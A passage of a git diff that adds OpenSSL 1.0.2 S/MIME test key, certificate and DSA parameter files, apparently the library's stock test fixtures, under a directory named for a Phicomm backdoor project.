+zJKhHoQkMB1qJzyIHjDzQ/J1xjfoF6i27afw1/WKboND5eseZhlhA2TO5ZJB6nGx
+DOE9lVQxYVml++cQj6foHh1TVJAgGl4mWuveW/Rz+NEhpK4zVeEsfMrbkBypPByy
+xzF1Z49t568xdIo+e8jLI8FjEdXOIUg4ehB3NY6SL8r4oJ49j/sJWfHcDoWH/LK9
+ZaBF8NpflJe3F40S8RDvM8j2HC+y2Q4QyKk1DXGiH+7yQLGWzr3M73kC3UBnnH0h
+Hxb7ISDCT7dCw/lH1nCbVFBOM0ASI26SSsFSXQrvD2kryRcTZ0KkyyhhoPODWpU+
+TQMsxQQiAiAdCUJ5n2Q9hIynN8BMpnRcdfH696BKejGx+2Mr2kfnnA==
+-----END PRIVATE KEY-----
+-----BEGIN CERTIFICATE-----
+MIIFkDCCBHigAwIBAgIJANk5lu6mSyBEMA0GCSqGSIb3DQEBBQUAMEQxCzAJBgNV
+BAYTAlVLMRYwFAYDVQQKDA1PcGVuU1NMIEdyb3VwMR0wGwYDVQQDDBRUZXN0IFMv
+TUlNRSBSU0EgUm9vdDAeFw0xMzA3MTcxNzI4MzFaFw0yMzA1MjYxNzI4MzFaMEUx
+CzAJBgNVBAYTAlVLMRYwFAYDVQQKDA1PcGVuU1NMIEdyb3VwMR4wHAYDVQQDDBVU
+ZXN0IFMvTUlNRSBFRSBEU0EgIzIwggNGMIICOQYHKoZIzjgEATCCAiwCggEBAJB8
+uU116E+dOsYgyHDiuTS65rqTWcIbfNzJ9eWLXsF0HaTQcE9pMDdrdkd863UDDLRS
+7TBneB0+v3PQjriGclcgai7MhqdnudhEiYe1fkkwVtd7LGjU7B3ZmzegST2dBShS
+wzG+ZgL+CE8vlnHWk/FwcI7DNbGgbjJkyOKZc5zX9bvO8r/j+D8LP18i0PfN1zJ1
++Az+ErT8J5hDbXF+Gp/iaMq/2mWcJxaBOgYj7sfxUrzQwVuQ7ZApHPe8/X9OMro9
+Gb2wR4HlvXT5K8a/aPbD4ILR9cvizqfs+0GWb9vDDzEvX8DPyTB6NRwgjUNzy43D
+AhLAZvBoYG+XsgembbUCIQCuh1mL6cIpl1MvwiAKNfefQO6E9GRVA+PP8HpXB4tb
+0wKCAQB+KaRQ3CewYWnuYozMkqEehCQwHWonPIgeMPND8nXGN+gXqLbtp/DX9Ypu
+g0Pl6x5mGWEDZM7lkkHqcbEM4T2VVDFhWaX75xCPp+geHVNUkCAaXiZa695b9HP4
+0SGkrjNV4Sx8ytuQHKk8HLLHMXVnj23nrzF0ij57yMsjwWMR1c4hSDh6EHc1jpIv
+yvignj2P+wlZ8dwOhYf8sr1loEXw2l+Ul7cXjRLxEO8zyPYcL7LZDhDIqTUNcaIf
+7vJAsZbOvczveQLdQGecfSEfFvshIMJPt0LD+UfWcJtUUE4zQBIjbpJKwVJdCu8P
+aSvJFxNnQqTLKGGg84NalT5NAyzFA4IBBQACggEAItQlFu0t7Mw1HHROuuwKLS+E
+h2WNNZP96MLQTygOVlqgaJY+1mJLzvl/51LLH6YezX0t89Z2Dm/3SOJEdNrdbIEt
+tbu5rzymXxFhc8uaIYZFhST38oQwJOjM8wFitAQESe6/9HZjkexMqSqx/r5aEKTa
+LBinqA1BJRI72So1/1dv8P99FavPADdj8V7fAccReKEQKnfnwA7mrnD+OlIqFKFn
+3wCGk8Sw7tSJ9g6jgCI+zFwrKn2w+w+iot/Ogxl9yMAtKmAd689IAZr5GPPvV2y0
+KOogCiUYgSTSawZhr+rjyFavfI5dBWzMq4tKx/zAi6MJ+6hGJjJ8jHoT9JAPmaNg
+MF4wDAYDVR0TAQH/BAIwADAOBgNVHQ8BAf8EBAMCBeAwHQYDVR0OBBYEFGaxw04k
+qpufeGZC+TTBq8oMnXyrMB8GA1UdIwQYMBaAFMmRUwpjexZbi71E8HaIqSTm5bZs
+MA0GCSqGSIb3DQEBBQUAA4IBAQCk2Xob1ICsdHYx/YsBzY6E1eEwcI4RZbZ3hEXp
+VA72/Mbz60gjv1OwE5Ay4j+xG7IpTio6y2A9ZNepGpzidYcsL/Lx9Sv1LlN0Ukzb
+uk6Czd2sZJp+PFMTTrgCd5rXKnZs/0D84Vci611vGMA1hnUnbAnBBmgLXe9pDNRV
+6mhmCLLjJ4GOr5Wxt/hhknr7V2e1VMx3Q47GZhc0o/gExfhxXA8+gicM0nEYNakD
+2A1F0qDhQGakjuofANHhjdUDqKJ1sxurAy80fqb0ddzJt2el89iXKN+aXx/zEX96
+GI5ON7z/bkVwIi549lUOpWb2Mved61NBzCLKVP7HSuEIsC/I
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smdsa3.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smdsa3.pem
new file mode 100644
index 0000000..77acc5e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smdsa3.pem
@@ -0,0 +1,47 @@
+-----BEGIN PRIVATE KEY-----
+MIICZQIBADCCAjkGByqGSM44BAEwggIsAoIBAQCQfLlNdehPnTrGIMhw4rk0uua6
+k1nCG3zcyfXli17BdB2k0HBPaTA3a3ZHfOt1Awy0Uu0wZ3gdPr9z0I64hnJXIGou
+zIanZ7nYRImHtX5JMFbXeyxo1Owd2Zs3oEk9nQUoUsMxvmYC/ghPL5Zx1pPxcHCO
+wzWxoG4yZMjimXOc1/W7zvK/4/g/Cz9fItD3zdcydfgM/hK0/CeYQ21xfhqf4mjK
+v9plnCcWgToGI+7H8VK80MFbkO2QKRz3vP1/TjK6PRm9sEeB5b10+SvGv2j2w+CC
+0fXL4s6n7PtBlm/bww8xL1/Az8kwejUcII1Dc8uNwwISwGbwaGBvl7IHpm21AiEA
+rodZi+nCKZdTL8IgCjX3n0DuhPRkVQPjz/B6VweLW9MCggEAfimkUNwnsGFp7mKM
+zJKhHoQkMB1qJzyIHjDzQ/J1xjfoF6i27afw1/WKboND5eseZhlhA2TO5ZJB6nGx
+DOE9lVQxYVml++cQj6foHh1TVJAgGl4mWuveW/Rz+NEhpK4zVeEsfMrbkBypPByy
+xzF1Z49t568xdIo+e8jLI8FjEdXOIUg4ehB3NY6SL8r4oJ49j/sJWfHcDoWH/LK9
+ZaBF8NpflJe3F40S8RDvM8j2HC+y2Q4QyKk1DXGiH+7yQLGWzr3M73kC3UBnnH0h
+Hxb7ISDCT7dCw/lH1nCbVFBOM0ASI26SSsFSXQrvD2kryRcTZ0KkyyhhoPODWpU+
+TQMsxQQjAiEArJr6p2zTbhRppQurHGTdmdYHqrDdZH4MCsD9tQCw1xY=
+-----END PRIVATE KEY-----
+-----BEGIN CERTIFICATE-----
+MIIFkDCCBHigAwIBAgIJANk5lu6mSyBFMA0GCSqGSIb3DQEBBQUAMEQxCzAJBgNV
+BAYTAlVLMRYwFAYDVQQKDA1PcGVuU1NMIEdyb3VwMR0wGwYDVQQDDBRUZXN0IFMv
+TUlNRSBSU0EgUm9vdDAeFw0xMzA3MTcxNzI4MzFaFw0yMzA1MjYxNzI4MzFaMEUx
+CzAJBgNVBAYTAlVLMRYwFAYDVQQKDA1PcGVuU1NMIEdyb3VwMR4wHAYDVQQDDBVU
+ZXN0IFMvTUlNRSBFRSBEU0EgIzMwggNGMIICOQYHKoZIzjgEATCCAiwCggEBAJB8
+uU116E+dOsYgyHDiuTS65rqTWcIbfNzJ9eWLXsF0HaTQcE9pMDdrdkd863UDDLRS
+7TBneB0+v3PQjriGclcgai7MhqdnudhEiYe1fkkwVtd7LGjU7B3ZmzegST2dBShS
+wzG+ZgL+CE8vlnHWk/FwcI7DNbGgbjJkyOKZc5zX9bvO8r/j+D8LP18i0PfN1zJ1
++Az+ErT8J5hDbXF+Gp/iaMq/2mWcJxaBOgYj7sfxUrzQwVuQ7ZApHPe8/X9OMro9
+Gb2wR4HlvXT5K8a/aPbD4ILR9cvizqfs+0GWb9vDDzEvX8DPyTB6NRwgjUNzy43D
+AhLAZvBoYG+XsgembbUCIQCuh1mL6cIpl1MvwiAKNfefQO6E9GRVA+PP8HpXB4tb
+0wKCAQB+KaRQ3CewYWnuYozMkqEehCQwHWonPIgeMPND8nXGN+gXqLbtp/DX9Ypu
+g0Pl6x5mGWEDZM7lkkHqcbEM4T2VVDFhWaX75xCPp+geHVNUkCAaXiZa695b9HP4
+0SGkrjNV4Sx8ytuQHKk8HLLHMXVnj23nrzF0ij57yMsjwWMR1c4hSDh6EHc1jpIv
+yvignj2P+wlZ8dwOhYf8sr1loEXw2l+Ul7cXjRLxEO8zyPYcL7LZDhDIqTUNcaIf
+7vJAsZbOvczveQLdQGecfSEfFvshIMJPt0LD+UfWcJtUUE4zQBIjbpJKwVJdCu8P
+aSvJFxNnQqTLKGGg84NalT5NAyzFA4IBBQACggEAcXvtfiJfIZ0wgGpN72ZeGrJ9
+msUXOxow7w3fDbP8r8nfVkBNbfha8rx0eY6fURFVZzIOd8EHGKypcH1gS6eZNucf
+zgsH1g5r5cRahMZmgGXBEBsWrh2IaDG7VSKt+9ghz27EKgjAQCzyHQL5FCJgR2p7
+cv0V4SRqgiAGYlJ191k2WtLOsVd8kX//jj1l8TUgE7TqpuSEpaSyQ4nzJROpZWZp
+N1RwFmCURReykABU/Nzin/+rZnvZrp8WoXSXEqxeB4mShRSaH57xFnJCpRwKJ4qS
+2uhATzJaKH7vu63k3DjftbSBVh+32YXwtHc+BGjs8S2aDtCW3FtDA7Z6J8BIxaNg
+MF4wDAYDVR0TAQH/BAIwADAOBgNVHQ8BAf8EBAMCBeAwHQYDVR0OBBYEFMJxatDE
+FCEFGl4uoiQQ1050Ju9RMB8GA1UdIwQYMBaAFMmRUwpjexZbi71E8HaIqSTm5bZs
+MA0GCSqGSIb3DQEBBQUAA4IBAQBGZD1JnMep39KMOhD0iBTmyjhtcnRemckvRask
+pS/CqPwo+M+lPNdxpLU2w9b0QhPnj0yAS/BS1yBjsLGY4DP156k4Q3QOhwsrTmrK
+YOxg0w7DOpkv5g11YLJpHsjSOwg5uIMoefL8mjQK6XOFOmQXHJrUtGulu+fs6FlM
+khGJcW4xYVPK0x/mHvTT8tQaTTkgTdVHObHF5Dyx/F9NMpB3RFguQPk2kT4lJc4i
+Up8T9mLzaxz6xc4wwh8h70Zw81lkGYhX+LRk3sfd/REq9x4QXQNP9t9qU1CgrBzv
+4orzt9cda4r+rleSg2XjWnXzMydE6DuwPVPZlqnLbSYUy660
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smdsap.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smdsap.pem
new file mode 100644
index 0000000..249706c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smdsap.pem
@@ -0,0 +1,9 @@
+-----BEGIN DSA PARAMETERS-----
+MIIBHwKBgQDFJfsIPOIawMO5biw+AoYUhNVxReBOLQosU3Qv4B8krac0BNr3OjSG
+Lh1wZxHqhlAE0QmasTaKojuk20nNWeFnczSz6vDl0IVJEhS8VYor5kt9gLqtGcoA
+gsf4gRDIutJyQDaNn3IVY89uXUVIoexvQeLQDBCgQPC5O8rJdqBwtwIVAK2Jjt+d
+qk07eQUE59koYUEKyNorAoGBAI4IEpusf8G14kCHmRtnHXM2tG5EWJDmW6Qtwjqv
+Wp1GKUx5WFy1tVWR9nl5rL0Di+kNdENo+SkKj7h3uDulGOI6T0mQYbV2h1IK+FMO
+GnOqvZ8eNTE2n4PGTo5puZ63LBm+QYrQsrNiUY4vakLFQ2rEK/SLwdsDFK4ZSJCB
+Qw5z
+-----END DSA PARAMETERS-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smec1.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smec1.pem
new file mode 100644
index 0000000..75a8626
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smec1.pem
@@ -0,0 +1,22 @@
+-----BEGIN PRIVATE KEY-----
+MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgXzBRX9Z5Ib4LAVAS
+DMlYvkj0SmLmYvWULe2LfyXRmpWhRANCAAS+SIj2FY2DouPRuNDp9WVpsqef58tV
+3gIwV0EOV/xyYTzZhufZi/aBcXugWR1x758x4nHus2uEuEFi3Mr3K3+x
+-----END PRIVATE KEY-----
+-----BEGIN CERTIFICATE-----
+MIICoDCCAYigAwIBAgIJANk5lu6mSyBGMA0GCSqGSIb3DQEBBQUAMEQxCzAJBgNV
+BAYTAlVLMRYwFAYDVQQKDA1PcGVuU1NMIEdyb3VwMR0wGwYDVQQDDBRUZXN0IFMv
+TUlNRSBSU0EgUm9vdDAeFw0xMzA3MTcxNzI4MzFaFw0yMzA1MjYxNzI4MzFaMEQx
+CzAJBgNVBAYTAlVLMRYwFAYDVQQKDA1PcGVuU1NMIEdyb3VwMR0wGwYDVQQDDBRU
+ZXN0IFMvTUlNRSBFRSBFQyAjMTBZMBMGByqGSM49AgEGCCqGSM49AwEHA0IABL5I
+iPYVjYOi49G40On1ZWmyp5/ny1XeAjBXQQ5X/HJhPNmG59mL9oFxe6BZHXHvnzHi
+ce6za4S4QWLcyvcrf7GjYDBeMAwGA1UdEwEB/wQCMAAwDgYDVR0PAQH/BAQDAgXg
+MB0GA1UdDgQWBBR/ybxC2DI+Jydhx1FMgPbMTmLzRzAfBgNVHSMEGDAWgBTJkVMK
+Y3sWW4u9RPB2iKkk5uW2bDANBgkqhkiG9w0BAQUFAAOCAQEAdk9si83JjtgHHHGy
+WcgWDfM0jzlWBsgFNQ9DwAuB7gJd/LG+5Ocajg5XdA5FXAdKkfwI6be3PdcVs3Bt
+7f/fdKfBxfr9/SvFHnK7PVAX2x1wwS4HglX1lfoyq1boSvsiJOnAX3jsqXJ9TJiV
+FlgRVnhnrw6zz3Xs/9ZDMTENUrqDHPNsDkKEi+9SqIsqDXpMCrGHP4ic+S8Rov1y
+S+0XioMxVyXDp6XcL4PQ/NgHbw5/+UcS0me0atZ6pW68C0vi6xeU5vxojyuZxMI1
+DXXwMhOXWaKff7KNhXDUN0g58iWlnyaCz4XQwFsbbFs88TQ1+e/aj3bbwTxUeyN7
+qtcHJA==
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smec2.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smec2.pem
new file mode 100644
index 0000000..457297a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smec2.pem
@@ -0,0 +1,23 @@
+-----BEGIN PRIVATE KEY-----
+MIGPAgEAMBAGByqGSM49AgEGBSuBBAAQBHgwdgIBAQQjhHaq507MOBznelrLG/pl
+brnnJi/iEJUUp+Pm3PEiteXqckmhTANKAAQF2zs6vobmoT+M+P2+9LZ7asvFBNi7
+uCzLYF/8j1Scn/spczoC9vNzVhNw+Lg7dnjNL4EDIyYZLl7E0v69luzbvy+q44/8
+6bQ=
+-----END PRIVATE KEY-----
+-----BEGIN CERTIFICATE-----
+MIICpTCCAY2gAwIBAgIJANk5lu6mSyBHMA0GCSqGSIb3DQEBBQUAMEQxCzAJBgNV
+BAYTAlVLMRYwFAYDVQQKDA1PcGVuU1NMIEdyb3VwMR0wGwYDVQQDDBRUZXN0IFMv
+TUlNRSBSU0EgUm9vdDAeFw0xMzA3MTcxNzI4MzFaFw0yMzA1MjYxNzI4MzFaMEQx
+CzAJBgNVBAYTAlVLMRYwFAYDVQQKDA1PcGVuU1NMIEdyb3VwMR0wGwYDVQQDDBRU
+ZXN0IFMvTUlNRSBFRSBFQyAjMjBeMBAGByqGSM49AgEGBSuBBAAQA0oABAXbOzq+
+huahP4z4/b70tntqy8UE2Lu4LMtgX/yPVJyf+ylzOgL283NWE3D4uDt2eM0vgQMj
+JhkuXsTS/r2W7Nu/L6rjj/zptKNgMF4wDAYDVR0TAQH/BAIwADAOBgNVHQ8BAf8E
+BAMCBeAwHQYDVR0OBBYEFGf+QSQlkN20PsNN7x+jmQIJBDcXMB8GA1UdIwQYMBaA
+FMmRUwpjexZbi71E8HaIqSTm5bZsMA0GCSqGSIb3DQEBBQUAA4IBAQBaBBryl2Ez
+ftBrGENXMKQP3bBEw4n9ely6HvYQi9IC7HyK0ktz7B2FcJ4z96q38JN3cLxV0DhK
+xT/72pFmQwZVJngvRaol0k1B+bdmM03llxCw/uNNZejixDjHUI9gEfbigehd7QY0
+uYDu4k4O35/z/XPQ6O5Kzw+J2vdzU8GXlMBbWeZWAmEfLGbk3Ux0ouITnSz0ty5P
+rkHTo0uprlFcZAsrsNY5v5iuomYT7ZXAR3sqGZL1zPOKBnyfXeNFUfnKsZW7Fnlq
+IlYBQIjqR1HGxxgCSy66f1oplhxSch4PUpk5tqrs6LeOqc2+xROy1T5YrB3yjVs0
+4ZdCllHZkhop
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smroot.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smroot.pem
new file mode 100644
index 0000000..d1a253f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smroot.pem
@@ -0,0 +1,49 @@
+-----BEGIN PRIVATE KEY-----
+MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQCyyQXED5HyVWwq
+nXyzmY317yMUJrIfsKvREG2C691dJNHgNg+oq5sjt/fzkyS84AvdOiicAsao4cYL
+DulthaLpbC7msEBhvwAil0FNb5g3ERupe1KuTdUV1UuD/i6S2VoaNXUBBn1rD9Wc
+BBc0lnx/4Wt92eQTI6925pt7ZHPQw2Olp7TQDElyi5qPxCem4uT0g3zbZsWqmmsI
+MXbu+K3dEprzqA1ucKXbxUmZNkMwVs2XCmlLxrRUj8C3/zENtH17HWCznhR/IVcV
+kgIuklkeiDsEhbWvUQumVXR7oPh/CPZAbjGqq5mVueHSHrp7brBVZKHZvoUka28Q
+LWitq1W5AgMBAAECggEASkRnOMKfBeOmQy2Yl6K57eeg0sYgSDnDpd0FINWJ5x9c
+b58FcjOXBodtYKlHIY6QXx3BsM0WaSEge4d+QBi7S+u8r+eXVwNYswXSArDQsk9R
+Bl5MQkvisGciL3pvLmFLpIeASyS/BLJXMbAhU58PqK+jT2wr6idwxBuXivJ3ichu
+ISdT1s2aMmnD86ulCD2DruZ4g0mmk5ffV+Cdj+WWkyvEaJW2GRYov2qdaqwSOxV4
+Yve9qStvEIWAf2cISQjbnw2Ww6Z5ebrqlOz9etkmwIly6DTbrIneBnoqJlFFWGlF
+ghuzc5RE2w1GbcKSOt0qXH44MTf/j0r86dlu7UIxgQKBgQDq0pEaiZuXHi9OQAOp
+PsDEIznCU1bcTDJewANHag5DPEnMKLltTNyLaBRulMypI+CrDbou0nDr29VOzfXx
+mNvi/c7RttOBOx7kXKvu0JUFKe2oIWRsg0KsyMX7UFMVaHFgrW+8DhQc7HK7URiw
+nitOnA7YwIHRF9BMmcWcLFEYBQKBgQDC6LPbXV8COKO0YCfGXPnE7EZGD/p0Q92Z
+8CoSefphEScSdO1IpxFXG7fOZ4x2GQb9q7D3IvaeKAqNjUjkuyxdB30lIWDBwSWw
+fFgsa2SZwD5P60G/ar50YJr6LiF333aUMDVmC9swFfZERAEmGUz2NTrPWQdIx/lu
+PyDtUR75JQKBgHaoCCJ8vl5SJl1IA5GV4Bo8IoeLTSzsY9d09zMy6BoZcMD1Ix2T
+5S2cXhayoegl9PT6bsYSGHVWFCdJ86ktMI826TcXRzDaCvYhzc9THroJQcnfdbtP
+aHWezkv7fsAmkoPjn75K7ubeo+r7Q5qbkg6a1PW58N8TRXIvkackzaVxAoGBALAq
+qh3U+AHG9dgbrPeyo6KkuCOtX39ks8/mbfCDRZYkbb9V5f5r2tVz3R93IlK/7jyr
+yWimtmde46Lrl33922w+T5OW5qBZllo9GWkUrDn3s5qClcuQjJIdmxYTSfbSCJiK
+NkmE39lHkG5FVRB9f71tgTlWS6ox7TYDYxx83NTtAoGAUJPAkGt4yGAN4Pdebv53
+bSEpAAULBHntiqDEOu3lVColHuZIucml/gbTpQDruE4ww4wE7dOhY8Q4wEBVYbRI
+vHkSiWpJUvZCuKG8Foh5pm9hU0qb+rbQV7NhLJ02qn1AMGO3F/WKrHPPY8/b9YhQ
+KfvPCYimQwBjVrEnSntLPR0=
+-----END PRIVATE KEY-----
+-----BEGIN CERTIFICATE-----
+MIIDbjCCAlagAwIBAgIJAMc+8VKBJ/S9MA0GCSqGSIb3DQEBBQUAMEQxCzAJBgNV
+BAYTAlVLMRYwFAYDVQQKDA1PcGVuU1NMIEdyb3VwMR0wGwYDVQQDDBRUZXN0IFMv
+TUlNRSBSU0EgUm9vdDAeFw0xMzA3MTcxNzI4MjlaFw0yMzA3MTUxNzI4MjlaMEQx
+CzAJBgNVBAYTAlVLMRYwFAYDVQQKDA1PcGVuU1NMIEdyb3VwMR0wGwYDVQQDDBRU
+ZXN0IFMvTUlNRSBSU0EgUm9vdDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC
+ggEBALLJBcQPkfJVbCqdfLOZjfXvIxQmsh+wq9EQbYLr3V0k0eA2D6irmyO39/OT
+JLzgC906KJwCxqjhxgsO6W2FoulsLuawQGG/ACKXQU1vmDcRG6l7Uq5N1RXVS4P+
+LpLZWho1dQEGfWsP1ZwEFzSWfH/ha33Z5BMjr3bmm3tkc9DDY6WntNAMSXKLmo/E
+J6bi5PSDfNtmxaqaawgxdu74rd0SmvOoDW5wpdvFSZk2QzBWzZcKaUvGtFSPwLf/
+MQ20fXsdYLOeFH8hVxWSAi6SWR6IOwSFta9RC6ZVdHug+H8I9kBuMaqrmZW54dIe
+untusFVkodm+hSRrbxAtaK2rVbkCAwEAAaNjMGEwHQYDVR0OBBYEFMmRUwpjexZb
+i71E8HaIqSTm5bZsMB8GA1UdIwQYMBaAFMmRUwpjexZbi71E8HaIqSTm5bZsMA8G
+A1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgEGMA0GCSqGSIb3DQEBBQUAA4IB
+AQAwpIVWQey2u/XoQSMSu0jd0EZvU+lhLaFrDy/AHQeG3yX1+SAOM6f6w+efPvyb
+Op1NPI9UkMPb4PCg9YC7jgYokBkvAcI7J4FcuDKMVhyCD3cljp0ouuKruvEf4FBl
+zyQ9pLqA97TuG8g1hLTl8G90NzTRcmKpmhs18BmCxiqHcTfoIpb3QvPkDX8R7LVt
+9BUGgPY+8ELCgw868TuHh/Cnc67gBtRjBp0sCYVzGZmKsO5f1XdHrAZKYN5mEp0C
+7/OqcDoFqORTquLeycg1At/9GqhDEgxNrqA+YEsPbLGAfsNuXUsXs2ubpGsOZxKt
+Emsny2ah6fU2z7PztrUy/A80
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smrsa1.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smrsa1.pem
new file mode 100644
index 0000000..d0d0b9e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smrsa1.pem
@@ -0,0 +1,49 @@
+-----BEGIN PRIVATE KEY-----
+MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQDXr9uzB/20QXKC
+xhkfNnJvl2xl1hzdOcrQmAqo+AAAcA/D49ImuJDVQRaK2bcj54XB26i1kXuOrxID
+3/etUb8yudfx8OAVwh8G0xVA4zhr8uXW85W2tBr4v0Lt+W6lSd6Hmfrk4GmE9LTU
+/vzl9HUPW6SZShN1G0nY6oeUXvLi0vasEUKv3a51T6JFYg4c7qt5RCk/w8kwrQ0D
+orQwCdkOPEIiC4b+nPStF12SVm5bx8rbYzioxuY/PdSebvt0APeqgRxSpCxqYnHs
+CoNeHzSrGXcP0COzFeUOz2tdrhmH09JLbGZs4nbojPxMkjpJSv3/ekDG2CHYxXSH
+XxpJstxZAgMBAAECggEASY4xsJaTEPwY3zxLqPdag2/yibBBW7ivz/9p80HQTlXp
+KnbxXj8nNXLjCytAZ8A3P2t316PrrTdLP4ML5lGwkM4MNPhek00GY79syhozTa0i
+cPHVJt+5Kwee/aVI9JmCiGAczh0yHyOM3+6ttIZvvXMVaSl4BUHvJ0ikQBc5YdzL
+s6VM2gCOR6K6n+39QHDI/T7WwO9FFSNnpWFOCHwAWtyBMlleVj+xeZX8OZ/aT+35
+27yjsGNBftWKku29VDineiQC+o+fZGJs6w4JZHoBSP8TfxP8fRCFVNA281G78Xak
+cEnKXwZ54bpoSa3ThKl+56J6NHkkfRGb8Rgt/ipJYQKBgQD5DKb82mLw85iReqsT
+8bkp408nPOBGz7KYnQsZqAVNGfehM02+dcN5z+w0jOj6GMPLPg5whlEo/O+rt9ze
+j6c2+8/+B4Bt5oqCKoOCIndH68jl65+oUxFkcHYxa3zYKGC9Uvb+x2BtBmYgvDRG
+ew6I2Q3Zyd2ThZhJygUZpsjsbQKBgQDdtNiGTkgWOm+WuqBI1LT5cQfoPfgI7/da
+ZA+37NBUQRe0cM7ddEcNqx7E3uUa1JJOoOYv65VyGI33Ul+evI8h5WE5bupcCEFk
+LolzbMc4YQUlsySY9eUXM8jQtfVtaWhuQaABt97l+9oADkrhA+YNdEu2yiz3T6W+
+msI5AnvkHQKBgDEjuPMdF/aY6dqSjJzjzfgg3KZOUaZHJuML4XvPdjRPUlfhKo7Q
+55/qUZ3Qy8tFBaTderXjGrJurc+A+LiFOaYUq2ZhDosguOWUA9yydjyfnkUXZ6or
+sbvSoM+BeOGhnezdKNT+e90nLRF6cQoTD7war6vwM6L+8hxlGvqDuRNFAoGAD4K8
+d0D4yB1Uez4ZQp8m/iCLRhM3zCBFtNw1QU/fD1Xye5w8zL96zRkAsRNLAgKHLdsR
+355iuTXAkOIBcJCOjveGQsdgvAmT0Zdz5FBi663V91o+IDlryqDD1t40CnCKbtRG
+hng/ruVczg4x7OYh7SUKuwIP/UlkNh6LogNreX0CgYBQF9troLex6X94VTi1V5hu
+iCwzDT6AJj63cS3VRO2ait3ZiLdpKdSNNW2WrlZs8FZr/mVutGEcWho8BugGMWST
+1iZkYwly9Xfjnpd0I00ZIlr2/B3+ZsK8w5cOW5Lpb7frol6+BkDnBjbNZI5kQndn
+zQpuMJliRlrq/5JkIbH6SA==
+-----END PRIVATE KEY-----
+-----BEGIN CERTIFICATE-----
+MIIDbDCCAlSgAwIBAgIJANk5lu6mSyBAMA0GCSqGSIb3DQEBBQUAMEQxCzAJBgNV
+BAYTAlVLMRYwFAYDVQQKDA1PcGVuU1NMIEdyb3VwMR0wGwYDVQQDDBRUZXN0IFMv
+TUlNRSBSU0EgUm9vdDAeFw0xMzA3MTcxNzI4MzBaFw0yMzA1MjYxNzI4MzBaMEUx
+CzAJBgNVBAYTAlVLMRYwFAYDVQQKDA1PcGVuU1NMIEdyb3VwMR4wHAYDVQQDDBVU
+ZXN0IFMvTUlNRSBFRSBSU0EgIzEwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
+AoIBAQDXr9uzB/20QXKCxhkfNnJvl2xl1hzdOcrQmAqo+AAAcA/D49ImuJDVQRaK
+2bcj54XB26i1kXuOrxID3/etUb8yudfx8OAVwh8G0xVA4zhr8uXW85W2tBr4v0Lt
++W6lSd6Hmfrk4GmE9LTU/vzl9HUPW6SZShN1G0nY6oeUXvLi0vasEUKv3a51T6JF
+Yg4c7qt5RCk/w8kwrQ0DorQwCdkOPEIiC4b+nPStF12SVm5bx8rbYzioxuY/PdSe
+bvt0APeqgRxSpCxqYnHsCoNeHzSrGXcP0COzFeUOz2tdrhmH09JLbGZs4nbojPxM
+kjpJSv3/ekDG2CHYxXSHXxpJstxZAgMBAAGjYDBeMAwGA1UdEwEB/wQCMAAwDgYD
+VR0PAQH/BAQDAgXgMB0GA1UdDgQWBBTmjc+lrTQuYx/VBOBGjMvufajvhDAfBgNV
+HSMEGDAWgBTJkVMKY3sWW4u9RPB2iKkk5uW2bDANBgkqhkiG9w0BAQUFAAOCAQEA
+dr2IRXcFtlF16kKWs1VTaFIHHNQrfSVHBkhKblPX3f/0s/i3eXgwKUu7Hnb6T3/o
+E8L+e4ioQNhahTLt9ruJNHWA/QDwOfkqM3tshCs2xOD1Cpy7Bd3Dn0YBrHKyNXRK
+WelGp+HetSXJGW4IZJP7iES7Um0DGktLabhZbe25EnthRDBjNnaAmcofHECWESZp
+lEHczGZfS9tRbzOCofxvgLbF64H7wYSyjAe6R8aain0VRbIusiD4tCHX/lOMh9xT
+GNBW8zTL+tV9H1unjPMORLnT0YQ3oAyEND0jCu0ACA1qGl+rzxhF6bQcTUNEbRMu
+9Hjq6s316fk4Ne0EUF3PbA==
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smrsa2.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smrsa2.pem
new file mode 100644
index 0000000..2f17cb2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smrsa2.pem
@@ -0,0 +1,49 @@
+-----BEGIN PRIVATE KEY-----
